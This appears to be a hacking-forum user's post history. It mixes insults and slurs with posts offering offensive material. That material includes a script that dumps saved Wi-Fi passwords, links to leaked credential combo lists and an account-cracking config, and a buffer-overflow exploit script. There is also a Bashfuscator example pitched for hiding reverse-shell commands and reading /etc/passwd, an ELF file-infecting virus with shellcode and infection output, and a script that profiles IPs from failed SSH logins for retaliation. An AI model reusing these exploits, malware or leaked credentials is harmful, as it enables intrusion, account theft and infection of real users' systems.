mesvak

Everything posted by mesvak

  1. sir fuck u why u gae and posting others nudes oooof that s so milenial
  2. welp this seems like a legit shit but i like it how u play with words nibba and i like to see u in the future having cheat chat sir can u call my manager to make an appointment so we can talk and hope u enjoi ur stay here with us wlc nibba leecher
  3. ok let me explain one by one why we import subprocess because we needa connect to cmd and then in cmd if you type netsh wlan show profile {Profile Name} key=clear you will see the wifi password so we will use that fucking command to extract the wifi password so we use subprocess.check_output and ..... . then we will try to decode it by utf-8 sometimes its not utf-8 if we wanna ignore that type and just print it out we will use try And except index done
     [hide]
     import subprocess

     # List the WLAN profiles saved on this machine
     data = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8', errors="backslashreplace").split('\n')
     profiles = [i.split(":")[1][1:-1] for i in data if "All User Profile" in i]

     for i in profiles:
         try:
             # Query one profile with key=clear and keep only the "Key Content" line
             results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8', errors="backslashreplace").split('\n')
             results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
             try:
                 print("{:<30}| {:<}".format(i, results[0]))
             except IndexError:
                 # No "Key Content" line for this profile
                 print("{:<30}| {:<}".format(i, ""))
         except subprocess.CalledProcessError:
             print("{:<30}| {:<}".format(i, "ENCODING ERROR"))

     input("")
     [/hide]
  4. [hide] https://www.upload.ee/files/10079188/2k_France.txt.html [/hide] Don't forget to lib a like all creds goes to mesvak cz i m the one who is leeching them XD respect me with u r fucking likes lils florain is GOOD but still a pleb
  5. [hide] https://www.upload.ee/files/10079195/9K__Germany__1_.txt.html [/hide]
  6. [hide] https://www.upload.ee/files/10079189/4K_USA.txt.html [/hide]
  7. [hide] https://www.upload.ee/files/10079190/400k_SQLi_USA.txt.html [/hide]
  8. [hide] https://www.upload.ee/files/10079191/8K.txt.html [/hide]
  9. [hide] https://www.upload.ee/files/10079197/Split__1.txt.html [/hide]
  10. [hide] https://www.upload.ee/files/10079192/100K.txt.html [/hide]
  11. [hide] https://www.upload.ee/files/10079193/Indian_Semi_Used.txt.html [/hide]
  12. [hide] https://www.upload.ee/files/10078940/Dork_Games__Priv.txt.html [/hide]
  13. NORMAL PROXIES COMBO EMAIL /PASS CAPTURE ( DATE ,SUB , PLAN START , PLAN END ) [hide] https://www.upload.ee/files/10074518/ErosNow.ini__1_.sccfg.html [/hide]
  14. [hide] https://www.upload.ee/files/10070709/Socks4.txt.html [/hide]
  15. [hide] https://www.upload.ee/files/10070710/HTTP.txt.html [/hide]
  16. i never tried it with c# tbh but tried it with java like 2 years ago and about 3 months ago there was a person who created a similar shit which is this guy https://github.com/trekawek/coffee-gb/tree/master/src/main/java/eu/rekawek/coffeegb/cpu But its written in java i can translate it to c# if u didnt get it just give a quick brief shit so basically for writing an emulator you needa consider 1- cpu ( timing and .....) 2- memory and dont forget you needa write diff script for each of them seemingly in this script that tbh i m a bit confused about what u written there cause you cannot bind them without importing them Apparently this is the case you working on
      }

      public OpcodeBuilder proceedIf(String condition) {
          ops.add(new Op() {
              @Override
              public boolean proceed(Registers registers) {
                  switch (condition) {
                      case "NZ":
                          return !registers.getFlags().isZ();
                      case "Z":
                          return registers.getFlags().isZ();
                      case "NC":
                          return !registers.getFlags().isC();
                      case "C":
                          return registers.getFlags().isC();
                  }
      And as a reminder you needa mention the value of bit u going to use and what is z is it below z<8 bits or ......
  17. sir im the best pleb u can find how can i help u
  18. [hide] https://www.upload.ee/files/10066419/Israeel_IP.txt.html [/hide]
  19. [hide] A script to exploit it might look like this:
      from subprocess import Popen, PIPE, STDOUT
      import struct

      p = Popen([r'ConsoleApplication4.exe', 'f'], stdout=PIPE, stdin=PIPE, stderr=STDOUT)

      # -1 passes the signed comparison against 0x10
      enter = b"-1\n"
      p.stdin.write(enter)

      # 32-bit little-endian packing is assumed for the three values
      numero = struct.pack("<I", 0x34333231)
      c = struct.pack("<I", 0x43434343)  # can be any value; this filler is arbitrary
      key = struct.pack("<I", 0x45934215)

      # 16 bytes fill the buffer, then numero, c and key follow it
      payload = b"A" * 16 + numero + c + key + b"\n"
      p.stdin.write(payload)

      testresult = p.communicate()[0]
      print(testresult)
      We see that it passes -1 as the number to pass the check when it is compared as signed against 0x10, then the 16 bytes to fill the buffer, then the number, to which I passed a correct value of 0x34333231 because the overflow will change it, then c, which can be any value, and then the key 0x45934215.
      [/hide]
  20. Link: https://github.com/Bashfuscator/Bashfuscator
      Example obfuscated payload (input is cat /etc/passwd):
      Bashfuscator makes obfuscating Bash one-liners and scripts incredibly easy. It can be used from the command line, or as a Python library.
      You can manually specify commands or scripts for Bashfuscator to obfuscate, feed it stdin to obfuscate and pass output through a pipeline, or use it in an existing Python 3 project. A great example of Bashfuscator’s use as a library is integration with a reverse or bind shell handler. In only 3 extra lines of code, every command you send through your reverse or bind shell will now be obfuscated transparently. Example:
      from bashfuscator.core.obfuscation_handler import ObfuscationHandler

      # socket code here

      obHandler = ObfuscationHandler()

      inputCmd = input("$ ")
      obfCommand = obHandler.genObfuscationLayer(inputCmd)

      # send command to reverse/bind shell
      EXAMPLE FOR PAYLOAD : https://asciinema.org/a/6LmMVyoxUbDIwvl5yzynVbrS1
      YOU CAN USE BASE 64 BTW BUT ITS EZ TO BE DECRYPTED
  21. this is so simple just you needa know
        • knowing stuff in C/C++
        • knowing stuff in Intel x86 assembly
        • Knowledge of the WinAPI and its documentation
        • Knowledge of the PE file structure
        • Knowledge of Dynamic Linked Libraries
      [hide]
      poc .c written in c++ https://pastr.io/view/sbYDYI and assembly code
      section .text
      global _start

      _start:
          sub r12, 0x4f20
          push rax
          push rdi
          push rsi
          push rdx
          mov rax,1               ; [1] - sys_write
          mov rdi,1               ; 0 = stdin / 1 = stdout / 2 = stderr
          lea rsi,[rel msg]       ; pointer(mem address) to msg (*char[])
          mov rdx, msg_end - msg  ; msg size
          syscall                 ; calls the function stored in rax
          pop rdx
          pop rsi
          pop rdi
          pop rax
          jmp r12

      align 8
          msg     db 'Infected file Test',0x0a,0
          msg_end db 0x0
      and usage written by shitty hands
      $ cp /bin/uname evil_uname
      $ ./niga evil_uname
      ELF virus example
      Running in offset mode
      + Mapped file (35032 bytes) at 0x7fff7ae5a540
      + Processing Victim -> Entry point value: 0x1f60
      + Processing Victim -> Found .text segment executable (# 2)
      * Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990)
      offset == 0x4f20
      $ #change offset on shellcoda.asm
      $ nasm -f elf64 shellcode.asm
      $ ./niga evil_uname shellcode.o
      ELF virus example
      + Mapped file (35032 bytes) at 0x7ffc51d5d920
      + Processing Victim -> Entry point value: 0x1f60
      + Processing Victim -> Found .text segment executable (# 2)
      * Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990)
      + Processing victim -> Base Address: 0x (nil)
      + Mapped file (704 bytes) in 0x7ffc51d5d928
      + Payload Process -> Number of Sections in the Payload file: 5. Searching for the '.text' section
      + Processing payload -> sname: ''
      + Processing payload -> sname: '.text' has entered the returning if
      shdr-> sh_name: 1
      shdr-> sh_type: 1
      shdr-> sh_addr: 0
      + Processing Payload -> Section .text Payload file found in offset 180 (Size: 4a bytes)
      $ ./evil_uname
      Infected file Test
      me no gae u are all retarded plebs Xd
      Linux
      [/hide]
  22. WELP WHAT IT ESSENTIALLY DO IS GET IPS WHICH ARE FAILED TO CONNECT TO UR VPS AND USE THAT IP AGAINST THEM LETS SEE THE SCRIPT IF U HAVE TROUBLE UNDERSTANDING IT TELL ME I WILL MAKE A GUIDE FOR IT
      [hide]
      #!/usr/bin/python3.4
      #BY MESVAK
      import re
      import urllib.request
      import json

      log_path = "/var/log/auth.log"
      hosts = []
      key = "{YOUR_API_KEY}"

      #EXTRACT THE SOURCE IP FROM A LOG LINE
      #(get_ip is called below but was not defined in the post; this regex version is an assumption)
      def get_ip(line):
          match = re.search(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", line)
          return match.group(0) if match else None

      #GET FAILED PASSWORD ATTEMPT
      def get_host(text):
          for line in text.split('\n'):
              if line.find("Failed password for invalid ") != -1:
                  ip = get_ip(line)
                  if ip and ip not in hosts:
                      hosts.append(ip)
          return hosts

      #GET USERNAME
      def get_username(line):
          username_word = line.split("Failed password for invalid user ")
          username = (username_word[1]).split(" ")
          return username[0]

      #LOCATE IP WITH GEOIP
      def geoip(host):
          response = urllib.request.urlopen("http://freegeoip.net/json/"+host)
          info = json.loads(response.read().decode("utf-8"))
          print("\n[+] Tracking ip {}".format(info['ip']))
          print("-------------------------------")
          print('\tCountry : {}\n\ttimezone : {}\n\tlatitude : {}\n\tlongitude : {}'.format(info['country_name'],info['time_zone'],info['latitude'],info['longitude']))

      def passive_recon(host,key):
          url = "https://api.shodan.io/shodan/host/{}?key={}&minify=true".format(host,key)
          try:
              response = urllib.request.urlopen(url)
              result = json.loads(response.read().decode('utf-8'))
              print("[+] Passive Recon using shodan.io")
              print("-------------------------------")
              print("\tPort : {}\n\tOrganisation {}".format(result['ports'],result['org']))
              for x in range(len(result['ports'])):
                  print("Banner {}".format(result['data'][x]['data']))
          except Exception:
              #ANY HTTP OR PARSING ERROR ENDS UP HERE
              print("[+] Passive Recon using shodan.io")
              print("-------------------------------")
              print("\tCan't retrieve information")

      if __name__ == "__main__":
          with open(log_path, 'rt') as log:
              text = log.read()
          get_host(text)
          for host in hosts:
              geoip(host)
              passive_recon(host,key)
      [/hide]